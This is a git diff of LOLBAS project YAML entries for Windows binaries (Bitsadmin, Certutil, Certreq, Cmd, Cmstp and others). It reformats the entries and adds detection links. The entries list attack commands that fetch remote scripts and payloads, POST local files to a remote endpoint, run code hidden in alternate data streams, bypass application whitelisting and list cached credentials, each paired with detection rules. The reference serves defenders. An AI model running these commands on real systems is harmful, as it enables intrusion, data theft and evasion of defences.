b/yml/OSBinaries/Bitsadmin.yml @@ -1,58 +1,73 @@ ---- Name: Bitsadmin.exe Description: Used for managing background intelligent transfer -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1 - Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job. - Usecase: Performs execution of specified file in the alternate data stream, can be used as a defensive evasion or persistence technique. - Category: ADS - Privileges: User - MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1 - Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. - Usecase: Download file from Internet - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset - Description: Command for copying cmd.exe to another folder - Usecase: Copy file - Category: Copy - Privileges: User - MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset - Description: One-liner that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. - Usecase: Execute binary file specified. Can be used as a defensive evasion. - Category: Execute - Privileges: User - MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe + bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin + /RESUME 1 bitsadmin /complete 1 + Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the + job to run the target command from an Alternate data stream, then resume and complete + the job. + Usecase: Performs execution of specified file in the alternate data stream, can + be used as a defensive evasion or persistence technique. + Category: ADS + Privileges: User + MitreID: T1564.004 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 +- Command: bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe + c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1 + Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the + job to run the target command, then resume and complete the job. + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 +- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe + c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin + /reset + Description: Command for copying cmd.exe to another folder + Usecase: Copy file + Category: Copy + Privileges: User + MitreID: T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe + c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe + NULL & bitsadmin /RESUME 1 & bitsadmin /Reset + Description: One-liner that creates a bitsadmin job named 1, add cmd.exe to the + job, configure the job to run the target command, then resume and complete the + job. + Usecase: Execute binary file specified. Can be used as a defensive evasion. + Category: Execute + Privileges: User + MitreID: T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - - Path: C:\Windows\System32\bitsadmin.exe - - Path: C:\Windows\SysWOW64\bitsadmin.exe +- Path: C:\Windows\System32\bitsadmin.exe +- Path: C:\Windows\SysWOW64\bitsadmin.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/90ca1a8ad2e5c96d09a9ae4ff92483a2110d49ff/rules/windows/process_creation/win_process_creation_bitsadmin_download.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/abcaf00aeef3769aa2a6f66f7fb6537b867c1691/rules/proxy/proxy_ua_bitsadmin_susp_tld.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/e40b8592544721c689f8ae96477ea1218e4c7a05/rules/windows/process_creation/win_monitoring_for_persistence_via_bits.yml - - Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/bitsadmin_download_file.yml - - IOC: Child process from bitsadmin.exe - - IOC: bitsadmin creates new files - - IOC: bitsadmin adds data to alternate data stream +- Sigma: https://github.com/SigmaHQ/sigma/blob/90ca1a8ad2e5c96d09a9ae4ff92483a2110d49ff/rules/windows/process_creation/win_process_creation_bitsadmin_download.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/abcaf00aeef3769aa2a6f66f7fb6537b867c1691/rules/proxy/proxy_ua_bitsadmin_susp_tld.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/e40b8592544721c689f8ae96477ea1218e4c7a05/rules/windows/process_creation/win_monitoring_for_persistence_via_bits.yml +- Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/bitsadmin_download_file.yml +- IOC: Child process from bitsadmin.exe +- IOC: bitsadmin creates new files +- IOC: bitsadmin adds data to alternate data stream +- Splunk: https://research.splunk.com/endpoint/80630ff4-8e4c-11eb-aab5-acde48001122/ Resources: - - Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - - Link: https://www.youtube.com/watch?v=_8xJaaQlpBo - - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f +- Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 +- Link: https://www.youtube.com/watch?v=_8xJaaQlpBo +- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f Acknowledgement: - - Person: Rob Fuller - Handle: '@mubix' - - Person: Chris Gates - Handle: '@carnal0wnage' - - Person: Oddvar Moe - Handle: '@oddvarmoe' +- Person: Rob Fuller + Handle: '@mubix' +- Person: Chris Gates + Handle: '@carnal0wnage' +- Person: Oddvar Moe + Handle: '@oddvarmoe' diff --git a/yml/OSBinaries/Certoc.yml b/yml/OSBinaries/Certoc.yml index fc183f6b..a4293b55 100644 --- a/yml/OSBinaries/Certoc.yml +++ b/yml/OSBinaries/Certoc.yml @@ -1,36 +1,35 @@ ---- Name: CertOC.exe Description: Used for installing certificates -Author: 'Ensar Samil' +Author: Ensar Samil Created: 2021-10-07 Commands: - - Command: certoc.exe -LoadDLL "C:\test\calc.dll" - Description: Loads the target DLL file - Usecase: Execute code within DLL file - Category: Execute - Privileges: User - MitreID: T1218 - OperatingSystem: Windows Server 2022 - - Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1 - Description: Downloads text formatted files - Usecase: Download scripts, webshells etc. - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows Server 2022 +- Command: certoc.exe -LoadDLL "C:\test\calc.dll" + Description: Loads the target DLL file + Usecase: Execute code within DLL file + Category: Execute + Privileges: User + MitreID: T1218 + OperatingSystem: Windows Server 2022 +- Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1 + Description: Downloads text formatted files + Usecase: Download scripts, webshells etc. + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows Server 2022 Full_Path: - - Path: c:\windows\system32\certoc.exe - - Path: c:\windows\syswow64\certoc.exe +- Path: c:\windows\system32\certoc.exe +- Path: c:\windows\syswow64\certoc.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/406f10b583469f7f7c245ff41002f75902693b7d/rules/windows/process_creation/process_creation_certoc_execution.yml - - IOC: Process creation with given parameter - - IOC: Unsigned DLL load via certoc.exe - - IOC: Network connection via certoc.exe +- Sigma: https://github.com/SigmaHQ/sigma/blob/406f10b583469f7f7c245ff41002f75902693b7d/rules/windows/process_creation/process_creation_certoc_execution.yml +- IOC: Process creation with given parameter +- IOC: Unsigned DLL load via certoc.exe +- IOC: Network connection via certoc.exe Resources: - - Link: https://twitter.com/sblmsrsn/status/1445758411803480072?s=20 - - Link: https://twitter.com/sblmsrsn/status/1452941226198671363?s=20 +- Link: https://twitter.com/sblmsrsn/status/1445758411803480072?s=20 +- Link: https://twitter.com/sblmsrsn/status/1452941226198671363?s=20 Acknowledgement: - - Person: Ensar Samil - Handle: '@sblmsrsn' +- Person: Ensar Samil + Handle: '@sblmsrsn' diff --git a/yml/OSBinaries/Certreq.yml b/yml/OSBinaries/Certreq.yml index c713172f..e8fec701 100644 --- a/yml/OSBinaries/Certreq.yml +++ b/yml/OSBinaries/Certreq.yml @@ -1,34 +1,38 @@ ---- Name: CertReq.exe Description: Used for requesting and managing certificates -Author: 'David Middlehurst' +Author: David Middlehurst Created: 2020-07-07 Commands: - - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt - Description: Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory - Usecase: Download file from Internet - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini and show response in terminal - Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST - Usecase: Upload - Category: Upload - Privileges: User - MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 +- Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt + Description: Save the response from a HTTP POST to the endpoint https://example.org/ + as output.txt in the current directory + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 +- Command: CertReq -Post -config https://example.org/ c:\windows\win.ini and show + response in terminal + Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ + via HTTP POST + Usecase: Upload + Category: Upload + Privileges: User + MitreID: T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 Full_Path: - - Path: C:\Windows\System32\certreq.exe - - Path: C:\Windows\SysWOW64\certreq.exe +- Path: C:\Windows\System32\certreq.exe +- Path: C:\Windows\SysWOW64\certreq.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/eb8c9c046b86e7d412bdcc3235693fa1c00f70d6/rules/windows/process_creation/win_susp_certreq_download.yml - - IOC: certreq creates new files - - IOC: certreq makes POST requests +- Sigma: https://github.com/SigmaHQ/sigma/blob/eb8c9c046b86e7d412bdcc3235693fa1c00f70d6/rules/windows/process_creation/win_susp_certreq_download.yml +- IOC: certreq creates new files +- IOC: certreq makes POST requests Resources: - - Link: https://dtm.uk/certreq +- Link: https://dtm.uk/certreq Acknowledgement: - - Person: David Middlehurst - Handle: '@dtmsecurity' +- Person: David Middlehurst + Handle: '@dtmsecurity' diff --git a/yml/OSBinaries/Certutil.yml b/yml/OSBinaries/Certutil.yml index 7eed87ab..08b15eda 100644 --- a/yml/OSBinaries/Certutil.yml +++ b/yml/OSBinaries/Certutil.yml @@ -1,77 +1,86 @@ ---- Name: Certutil.exe Description: Windows binary used for handling certificates -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe - Description: Download and save 7zip to disk in the current folder. - Usecase: Download file from Internet - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe - Description: Download and save 7zip to disk in the current folder. - Usecase: Download file from Internet - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt - Description: Download and save a PS1 file to an Alternate Data Stream (ADS). - Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream - Category: ADS - Privileges: User - MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: certutil -encode inputFileName encodedOutputFileName - Description: Command to encode a file using Base64 - Usecase: Encode files to evade defensive measures - Category: Encode - Privileges: User - MitreID: T1027 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: certutil -decode encodedInputFileName decodedOutputFileName - Description: Command to decode a Base64 encoded file. - Usecase: Decode files to evade defensive measures - Category: Decode - Privileges: User - MitreID: T1140 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: certutil -decodehex encoded_hexadecimal_InputFileName decodedOutputFileName - Description: Command to decode a hexadecimal-encoded file decodedOutputFileName - Usecase: Decode files to evade defensive measures - Category: Decode - Privileges: User - MitreID: T1140 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 +- Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe + Description: Download and save 7zip to disk in the current folder. + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 +- Command: certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe + Description: Download and save 7zip to disk in the current folder. + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 +- Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 + c:\temp:ttt + Description: Download and save a PS1 file to an Alternate Data Stream (ADS). + Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream + Category: ADS + Privileges: User + MitreID: T1564.004 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 +- Command: certutil -encode inputFileName encodedOutputFileName + Description: Command to encode a file using Base64 + Usecase: Encode files to evade defensive measures + Category: Encode + Privileges: User + MitreID: T1027 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 +- Command: certutil -decode encodedInputFileName decodedOutputFileName + Description: Command to decode a Base64 encoded file. + Usecase: Decode files to evade defensive measures + Category: Decode + Privileges: User + MitreID: T1140 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 +- Command: certutil -decodehex encoded_hexadecimal_InputFileName decodedOutputFileName + Description: Command to decode a hexadecimal-encoded file decodedOutputFileName + Usecase: Decode files to evade defensive measures + Category: Decode + Privileges: User + MitreID: T1140 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 Full_Path: - - Path: C:\Windows\System32\certutil.exe - - Path: C:\Windows\SysWOW64\certutil.exe +- Path: C:\Windows\System32\certutil.exe +- Path: C:\Windows\SysWOW64\certutil.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/0fcbce993288f993e626494a50dad15fc26c8a0c/rules/windows/process_creation/win_susp_certutil_command.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_certutil_encode.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/e9260679d4aeae7f696001c5b14d318d31c8f076/rules/windows/process_creation/process_creation_root_certificate_installed.yml - - Elastic: https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml - - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml - - Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml - - Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml - - Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml - - IOC: Certutil.exe creating new files on disk - - IOC: Useragent Microsoft-CryptoAPI/10.0 - - IOC: Useragent CertUtil URL Agent +- Sigma: https://github.com/SigmaHQ/sigma/blob/0fcbce993288f993e626494a50dad15fc26c8a0c/rules/windows/process_creation/win_susp_certutil_command.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_certutil_encode.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/e9260679d4aeae7f696001c5b14d318d31c8f076/rules/windows/process_creation/process_creation_root_certificate_installed.yml +- Elastic: https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml +- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml +- Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml +- Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml +- Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml +- IOC: Certutil.exe creating new files on disk +- IOC: Useragent Microsoft-CryptoAPI/10.0 +- IOC: Useragent CertUtil URL Agent +- Splunk: https://research.splunk.com/endpoint/801ad9e4-8bfb-11eb-8b31-acde48001122/ +- Splunk: https://research.splunk.com/endpoint/415b4306-8bfb-11eb-85c4-acde48001122/ +- Splunk: https://research.splunk.com/endpoint/bfe94226-8c10-11eb-a4b3-acde48001122/ Resources: - - Link: https://twitter.com/Moriarty_Meng/status/984380793383370752 - - Link: https://twitter.com/mattifestation/status/620107926288515072 - - Link: https://twitter.com/egre55/status/1087685529016193025 +- Link: https://twitter.com/Moriarty_Meng/status/984380793383370752 +- Link: https://twitter.com/mattifestation/status/620107926288515072 +- Link: https://twitter.com/egre55/status/1087685529016193025 Acknowledgement: - - Person: Matt Graeber - Handle: '@mattifestation' - - Person: Moriarty - Handle: '@Moriarty_Meng' - - Person: egre55 - Handle: '@egre55' - - Person: Lior Adar +- Person: Matt Graeber + Handle: '@mattifestation' +- Person: Moriarty + Handle: '@Moriarty_Meng' +- Person: egre55 + Handle: '@egre55' +- Person: Lior Adar diff --git a/yml/OSBinaries/Cmd.yml b/yml/OSBinaries/Cmd.yml index 760946a1..9972acda 100644 --- a/yml/OSBinaries/Cmd.yml +++ b/yml/OSBinaries/Cmd.yml @@ -1,34 +1,42 @@ ---- Name: Cmd.exe Description: The command-line interpreter in Windows -Author: 'Ye Yint Min Thu Htut' +Author: Ye Yint Min Thu Htut Created: 2019-06-26 Commands: - - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat - Description: Add content to an Alternate Data Stream (ADS). - Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism - Category: ADS - Privileges: User - MitreID: T1059.003 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: cmd.exe - < fakefile.doc:payload.bat - Description: Execute payload.bat stored in an Alternate Data Stream (ADS). - Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism - Category: ADS - Privileges: User - MitreID: T1059.003 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 +- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct + ^scrobj.dll > fakefile.doc:payload.bat + Description: Add content to an Alternate Data Stream (ADS). + Usecase: Can be used to evade defensive countermeasures or to hide as a persistence + mechanism + Category: ADS + Privileges: User + MitreID: T1059.003 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 +- Command: cmd.exe - < fakefile.doc:payload.bat + Description: Execute payload.bat stored in an Alternate Data Stream (ADS). + Usecase: Can be used to evade defensive countermeasures or to hide as a persistence + mechanism + Category: ADS + Privileges: User + MitreID: T1059.003 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 Full_Path: - - Path: C:\Windows\System32\cmd.exe - - Path: C:\Windows\SysWOW64\cmd.exe +- Path: C:\Windows\System32\cmd.exe +- Path: C:\Windows\SysWOW64\cmd.exe Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml - - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml - - IOC: cmd.exe executing files from alternate data streams. - - IOC: cmd.exe creating/modifying file contents in an alternate data stream. +- Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml +- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml +- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml +- IOC: cmd.exe executing files from alternate data streams. +- IOC: cmd.exe creating/modifying file contents in an alternate data stream. +- Splunk: https://research.splunk.com/endpoint/dcfd6b40-42f9-469d-a433-2e53f7486664/ +- Splunk: https://research.splunk.com/endpoint/54a6ed00-3256-11ec-b031-acde48001122/ +- Splunk: https://research.splunk.com/endpoint/eb277ba0-b96b-11eb-b00e-acde48001122/ +- Splunk: https://research.splunk.com/endpoint/b89919ed-fe5f-492c-b139-95dbb162039e/ Resources: - - Link: https://twitter.com/yeyint_mth/status/1143824979139579904 +- Link: https://twitter.com/yeyint_mth/status/1143824979139579904 Acknowledgement: - - Person: r0lan - Handle: '@yeyint_mth' +- Person: r0lan + Handle: '@yeyint_mth' diff --git a/yml/OSBinaries/Cmdkey.yml b/yml/OSBinaries/Cmdkey.yml index bceafb42..f5a75684 100644 --- a/yml/OSBinaries/Cmdkey.yml +++ b/yml/OSBinaries/Cmdkey.yml @@ -1,24 +1,24 @@ ---- Name: Cmdkey.exe Description: creates, lists, and deletes stored user names and passwords or credentials. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: cmdkey /list - Description: List cached credentials - Usecase: Get credential information from host - Category: Credentials - Privileges: User - MitreID: T1078 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 +- Command: cmdkey /list + Description: List cached credentials + Usecase: Get credential information from host + Category: Credentials + Privileges: User + MitreID: T1078 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 Full_Path: - - Path: C:\Windows\System32\cmdkey.exe - - Path: C:\Windows\SysWOW64\cmdkey.exe +- Path: C:\Windows\System32\cmdkey.exe +- Path: C:\Windows\SysWOW64\cmdkey.exe Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/c3c152d457773454f67895008a1abde823be0755/rules/windows/process_creation/win_cmdkey_recon.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/c3c152d457773454f67895008a1abde823be0755/rules/windows/process_creation/win_cmdkey_recon.yml Resources: - - Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation - - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey +- Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation +- Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey Acknowledgement: - - Person: - Handle: +- Person: null + Handle: null diff --git a/yml/OSBinaries/Cmdl32.yml b/yml/OSBinaries/Cmdl32.yml index 67a7d1aa..d45fbabe 100644 --- a/yml/OSBinaries/Cmdl32.yml +++ b/yml/OSBinaries/Cmdl32.yml @@ -1,25 +1,27 @@ ---- Name: cmdl32.exe Description: Microsoft Connection Manager Auto-Download -Author: 'Elliot Killick' +Author: Elliot Killick Created: 2021-08-26 Commands: - - Command: cmdl32 /vpn /lan %cd%\config - Description: Download a file from the web address specified in the configuration file. The downloaded file will be in %TMP% under the name VPNXXXX.tmp where "X" denotes a random number or letter. - Usecase: Download file from Internet - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 +- Command: cmdl32 /vpn /lan %cd%\config + Description: Download a file from the web address specified in the configuration + file. The downloaded file will be in %TMP% under the name VPNXXXX.tmp where "X" + denotes a random number or letter. + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 Full_Path: - - Path: C:\Windows\System32\cmdl32.exe - - Path: C:\Windows\SysWOW64\cmdl32.exe +- Path: C:\Windows\System32\cmdl32.exe +- Path: C:\Windows\SysWOW64\cmdl32.exe Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/3416db73016f25ce115f5597fe74320d2428db66/rules/windows/process_creation/win_pc_susp_cmdl32_lolbas.yml - - IOC: Reports of downloading from suspicious URLs in %TMP%\config.log - - IOC: Useragent Microsoft(R) Connection Manager Vpn File Update +- Sigma: https://github.com/SigmaHQ/sigma/blob/3416db73016f25ce115f5597fe74320d2428db66/rules/windows/process_creation/win_pc_susp_cmdl32_lolbas.yml +- IOC: Reports of downloading from suspicious URLs in %TMP%\config.log +- IOC: Useragent Microsoft(R) Connection Manager Vpn File Update Resources: - - Link: https://github.com/LOLBAS-Project/LOLBAS/pull/151 +- Link: https://github.com/LOLBAS-Project/LOLBAS/pull/151 Acknowledgement: - - Person: Elliot Killick - Handle: '@elliotkillick' +- Person: Elliot Killick + Handle: '@elliotkillick' diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml index d4688c8a..3bddf4ed 100644 --- a/yml/OSBinaries/Cmstp.yml +++ b/yml/OSBinaries/Cmstp.yml @@ -1,44 +1,50 @@ ---- Name: Cmstp.exe Description: Installs or removes a Connection Manager service profile. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf - Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. - Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet. - Category: Execute - Privileges: User - MitreID: T1218.003 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf - Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. - Usecase: Execute code hidden within an inf file. Execute code directly from Internet. - Category: AWL Bypass - Privileges: User - MitreID: T1218.003 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf + Description: Silently installs a specially formatted local .INF without creating + a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes + a .SCT file using scrobj.dll. + Usecase: Execute code hidden within an inf file. Download and run scriptlets from + internet. + Category: Execute + Privileges: User + MitreID: T1218.003 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 +- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf + Description: Silently installs a specially formatted remote .INF without creating + a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes + a .SCT file using scrobj.dll. + 